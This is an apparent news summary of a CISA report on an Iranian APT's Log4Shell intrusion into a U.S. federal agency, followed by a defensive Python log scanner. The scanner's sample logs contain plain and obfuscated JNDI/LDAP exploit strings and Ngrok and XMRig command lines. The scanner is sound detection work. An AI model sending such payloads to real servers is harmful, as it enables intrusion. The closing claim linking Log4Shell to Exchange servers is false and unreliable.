An agency of the U.S. Federal Civilian Executive Branch (FCEB) became the victim of an attack carried out by an Iranian APT (Advanced Persistent Threat), according to CISA. The particular agency was not disclosed; the FCEB category includes all cabinet-level departments, such as the Departments of State, Energy, and Treasury, as well as all other non-military operations such as the Social Security Administration. The attack was carried out through an unpatched VMware Horizon server, where the threat actor used the Log4Shell vulnerability to gain access to a secured network. Once inside, the group was able to move laterally through the network to the domain controller and steal credentials. The APT also deployed Ngrok reverse proxies to maintain persistence and installed the XMRig cryptocurrency miner.
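As an added, defender-side example (not from the CISA advisory or the original article), the following Python scanner flags the two stages described above in constructed log lines: Log4Shell JNDI lookups in web requests, including the nested lower/upper and ${::-x} obfuscations commonly used to evade simple string matching, and process-creation records naming the Ngrok and XMRig binaries. All sample lines, hostnames, paths and IP addresses are constructed.

```python
import re

# Constructed sample log lines (not real agency telemetry): a plain JNDI probe,
# an obfuscated variant, a benign request, and two process-creation records.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.7 - - "GET /portal/ HTTP/1.1" 200 '
    '"${${lower:j}${upper:n}di:${::-l}dap://203.0.113.9:1389/a}"',
    '10.0.0.8 - - "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    'procmon host=ws01 image=C:\\Users\\Public\\ngrok.exe cmd="ngrok tcp 3389"',
    'procmon host=ws01 image=C:\\ProgramData\\xmrig.exe cmd="xmrig -o pool:3333"',
]

# ${lower:x} / ${upper:x} evaluate to x (case folding is irrelevant for matching).
_CASE_LOOKUP_RE = re.compile(r'\$\{(?:lower|upper):([^{}$]*)\}', re.IGNORECASE)
# ${::-x} and ${env:UNSET:-x} evaluate to the default value x.
_DEFAULT_RE = re.compile(r'\$\{[^{}$]*?:-([^{}$]*)\}')
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)
# Post-exploitation tooling named in the advisory, matched on binary/command name.
POST_EXPLOIT = {'ngrok': 'reverse proxy / persistence', 'xmrig': 'crypto miner'}


def normalize(line):
    """Collapse nested Log4j lookup obfuscations to the text they evaluate to."""
    prev = None
    while prev != line:  # innermost lookups resolve first; repeat until stable
        prev = line
        line = _CASE_LOOKUP_RE.sub(lambda m: m.group(1), line)
        line = _DEFAULT_RE.sub(lambda m: m.group(1), line)
    return line


def classify(line):
    """Return the findings for one log line (empty list if nothing suspicious)."""
    findings = []
    norm = normalize(line)
    if JNDI_RE.search(norm):
        findings.append('log4shell-jndi-lookup')
        if norm != line:
            findings.append('obfuscated-lookup')
    lowered = line.lower()
    findings += [f'post-exploitation:{k}' for k in POST_EXPLOIT if k in lowered]
    return findings


def scan(lines):
    """Scan many lines; returns (index, findings) for each line with a hit."""
    return [(i, f) for i, line in enumerate(lines) if (f := classify(line))]


if __name__ == '__main__':
    for idx, hits in scan(SAMPLE_LOGS):
        print(f'line {idx}: {", ".join(hits)}')
```

The normalization step matters because a scanner that only looks for the literal string `${jndi:` misses the second sample line, which a Log4j 2.x lookup chain resolves to exactly that string.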
As a general rule, whenever security patches are released for any vulnerability, the patch should be tested and deployed as soon as possible. With vulnerabilities such as Log4Shell, which presented a high risk due to the extensive use of on-prem and hybrid Exchange servers and the extensive exploitation in the wild, it is extremely important to push these patches to all affected systems. Threat actors often prey on victims by using old vulnerabilities that companies or organizations have failed to patch, which enables them to scale their operations and target security misconfigurations.